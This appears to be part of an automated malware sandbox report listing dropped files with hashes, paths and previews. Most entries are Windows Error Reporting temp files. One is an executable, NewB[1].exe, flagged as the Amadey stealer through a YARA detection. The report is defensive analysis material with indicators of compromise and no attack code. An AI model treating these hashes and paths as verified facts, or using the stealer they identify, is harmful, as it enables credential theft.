                                                                                                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.5.8.4.<./.P.i.

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERA45B.tmp.xml

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4718
                                                                                                                                                                                                                                        Entropy (8bit):4.533940523016823
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cvIwWl8zsqJg77aI9f0WpW8VYgYm8M4JR7LF8+q87cWX5ATin1fd:uIjf4I7Rt7V8J4e5y+pd
                                                                                                                                                                                                                                        MD5:7F479D7CE41C5359997BDBBB271119EE
                                                                                                                                                                                                                                        SHA1:1DC4ABDB30DE0CB23212B7CC9B3E392E611A822E
                                                                                                                                                                                                                                        SHA-256:7846237641570981365CAFA186DBCF830CDC3F2ADDECB1CD7C947DB133582501
                                                                                                                                                                                                                                        SHA-512:D7A310CB6BB09E343677BC85E3CA281E32291725BCB91243B6736FB70EB767969C46BAFA3914CA401BB1FCC070E3DA9279135F7E3BF1F30710DEAF85574FC3AF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="292957" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERA47B.tmp.csv

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):90260
                                                                                                                                                                                                                                        Entropy (8bit):3.0354213561783867
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:eWntMm7KDB+JPoG5q7T4aFkcHdn+b+d+ZYd++15zognUx:eWntMm7KDB+JPoG5q7T4aFkcHdn+b+d+
                                                                                                                                                                                                                                        MD5:F529130BED2DB0B7A7FFFA773152C056
                                                                                                                                                                                                                                        SHA1:2890F9EF247C67C973DDE077CE353ACE16C269F6
                                                                                                                                                                                                                                        SHA-256:E9F81A0A6C93F278FFB9AF8CF3069D16485B44930AE8B57A31D9F0978E54D85E
                                                                                                                                                                                                                                        SHA-512:74F43E3F7FE11BAF84A2764309C2D5A4EE862113E2F1156B98802D1BDE7597DABCB8DB0DA33D2C0776C9050F71440B721A2E25FC0F59F76149053B302375F0F0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERA585.tmp.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):13340
                                                                                                                                                                                                                                        Entropy (8bit):2.6862727063004974
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:TiZYW8oHvxm/YIYPGWzHPYEZjHtFi93oCmwpSo7ygd4ZaQyWMd3xCI3U3:2ZD8JPQlho5UaQyWM9xl3U3
                                                                                                                                                                                                                                        MD5:D7C9080A6EBE4593C9DC5BF292A4795E
                                                                                                                                                                                                                                        SHA1:412800D065B9E5B22082EBD26DFCB27E91D35C12
                                                                                                                                                                                                                                        SHA-256:9BF5E21CAF3D502713855E7435FA16E6532F16E9E1B59CF0B0033BB1AE0DF9CA
                                                                                                                                                                                                                                        SHA-512:4B81DEC749AAAFA052C730C008C81CFE7AC25B0223F1BE5F7282F25A1F94BB80A5FFEBD3BEB5C4F1E058F961D966A52D2E6EB8B71BBEE9C6578DD7DF279F07B2
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERAA60.tmp.csv

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):101064
                                                                                                                                                                                                                                        Entropy (8bit):3.0391029842570747
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:asQGKwobTDOLGJXc/1FSqaUgok+z+Y+y+nXvu+4+soH+E+D+q+O+E+2+f+H+T+jV:9
                                                                                                                                                                                                                                        MD5:ECAA4F9E18FEB316E091C794371643AB
                                                                                                                                                                                                                                        SHA1:94572C9D2F6E03C1B6FFE13E4D4685E0843D370C
                                                                                                                                                                                                                                        SHA-256:C5B75C66C0A48D8B8C62D843DF090D11D254662381DE48D66F8FBA1F7E5BC760
                                                                                                                                                                                                                                        SHA-512:70CB4F4BD08BC3A486870F89ABB4ADB93CA2ED8530E1DB3010657AA705D74E3F8CCA9EC11DFC110D8F4884FD677A822E3D5C9BCE87B81CB80410561550956A33
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERAC26.tmp.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):13340
                                                                                                                                                                                                                                        Entropy (8bit):2.6977698709752054
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:TiZYWNYNVW9YCY1Wa6HtYEZoitCivESC7wGV7plRaXtMIjQMJSxI4RAI:2ZD/10JV/RadMIjQMJSu4RAI
                                                                                                                                                                                                                                        MD5:3E2F8B9C041F896FE78280771EB703EA
                                                                                                                                                                                                                                        SHA1:DE3BE156B9F7B9BD59BB3594E9E385413BC7256C
                                                                                                                                                                                                                                        SHA-256:EBFAE8B3F4217E2C8BEB6384E28E2927513DD57ADB5D18A0C90B7D43FA84697B
                                                                                                                                                                                                                                        SHA-512:742D0223278F3CA76E51ADF44091B60C61DACE329FAEBDCF5C7D8F829841820D29ED890D6C46A96D622E6B5AB7AFB82E644CEF07BB981FC8E7E390ADA5CFEB12
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERB080.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6320
                                                                                                                                                                                                                                        Entropy (8bit):3.724169434824068
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:R6l7wVeJmuE6jIYilWJ9ancHpDY89b6E4sfw6em:R6lXJ86MY4WJ9D6Erfj
                                                                                                                                                                                                                                        MD5:24A2EA92C7DBB18EB1E97DC3ACAD889F
                                                                                                                                                                                                                                        SHA1:88F1AE95EBA13D59A301F3DBA086B31C76C13D98
                                                                                                                                                                                                                                        SHA-256:70CB8BE7893A144697F26BE3CBDE4EABEA8B83899F540A02F5C9C03FD6D822AA
                                                                                                                                                                                                                                        SHA-512:57A8F3637E93F3C46ADF3FEFEAE953FF82D5B6BB55CA8E86A8CEDCEBB0AC965164AE9241E1292E2D451A094D89E1D647A99F6B2146BAF0E7AB0A75617B92C2C0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.8.8.<./.P.i.

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERB0A0.tmp.xml

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4668
                                                                                                                                                                                                                                        Entropy (8bit):4.488031716305001
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cvIwWl8zsqJg77aI9f0WpW8VY5Ym8M4JR7kF2+q874rj5ATineNfd:uIjf4I7Rt7V1Jdd5y+Md
                                                                                                                                                                                                                                        MD5:2421192005E5E5D055EE9BEBC3ECD020
                                                                                                                                                                                                                                        SHA1:8F3EE1FC27CBBB66C7A60CC1BB63F4701389CE88
                                                                                                                                                                                                                                        SHA-256:004E356A1E69FE2133C5E1BB134195B70EF9323444896063F5BE49A7CDB68815
                                                                                                                                                                                                                                        SHA-512:CD01E882346BDE70F399348F9F483B200A51D1D93D1EAC376A30676954CDF004D0043362195765AD7734EB784001CBC5AA422967F099E1950065FB51B2EE87AA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="292957" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERB0C1.tmp.csv

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):90308
                                                                                                                                                                                                                                        Entropy (8bit):3.0368036861774823
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:/i4etqD22Gsuiq9a4zILtaWn+b+d+ZYd+9EdzJx3/NZja:/i4etqD22Gsuiq9a4zILtaWn+b+d+ZYe
                                                                                                                                                                                                                                        MD5:DC2DD6FB6CCC1E8161EB59795E860AD3
                                                                                                                                                                                                                                        SHA1:BE1305A32C63B2B59F001E3B01488E0D9F45CF0E
                                                                                                                                                                                                                                        SHA-256:0A9B2CB29EB4202E4048BA9ACF836727074FC7FCE6313D78AB8493A5D8CE37EE
                                                                                                                                                                                                                                        SHA-512:DF3E281260A86B7B53E43722D445B5BCE2E344C5FAC93F47466F1088B7AB17379A608FD613DD41163C41A65AC10DBD75922A9AEDE3498A121F7D7BBD3ACC975C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERB1CC.tmp.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):13340
                                                                                                                                                                                                                                        Entropy (8bit):2.6866068333000084
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:TiZYWHbXBPKiOYZOY2W85HeYEZnBtFib3jCDwMa3NWLea+Ez+MI0YfPIIVl3:2ZDE9mOWeceaDz+MI0YfPvVl3
                                                                                                                                                                                                                                        MD5:CFE38BDDA1AA1A01CF2412C8C19D89CE
                                                                                                                                                                                                                                        SHA1:22026D9DF773C55CD004C325B2BDC353D345E647
                                                                                                                                                                                                                                        SHA-256:3B8F58E2352F043BED9155372FF403B407B76B1533C4B435AAE8884D2FABB56F
                                                                                                                                                                                                                                        SHA-512:C278A123A5669864A1059FAB6A2242CCEAA8ACB2CFAF7914DE20FFCD2AAE15F30A43006054B2AA4CE47C133A6CBAF3C060E7053138F494FFE4ACA479228B6EF6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\NewB[1].exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):428544
                                                                                                                                                                                                                                        Entropy (8bit):6.494348537450964
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:5noAx+FnmuQhimtPURimLqevmipum+K4Y:5+FnmuGtpMLnLYY
                                                                                                                                                                                                                                        MD5:0099A99F5FFB3C3AE78AF0084136FAB3
                                                                                                                                                                                                                                        SHA1:0205A065728A9EC1133E8A372B1E3864DF776E8C
                                                                                                                                                                                                                                        SHA-256:919AE827FF59FCBE3DBAEA9E62855A4D27690818189F696CFB5916A88C823226
                                                                                                                                                                                                                                        SHA-512:5AC4F3265C7DD7D172284FB28C94F8FC6428C27853E70989F4EC4208F9897BE91720E8EEE1906D8E843AB05798F3279A12492A32E8A118F5621AC5E1BE2031B6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\NewB[1].exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                                                                                                                                        Reputation:unknown
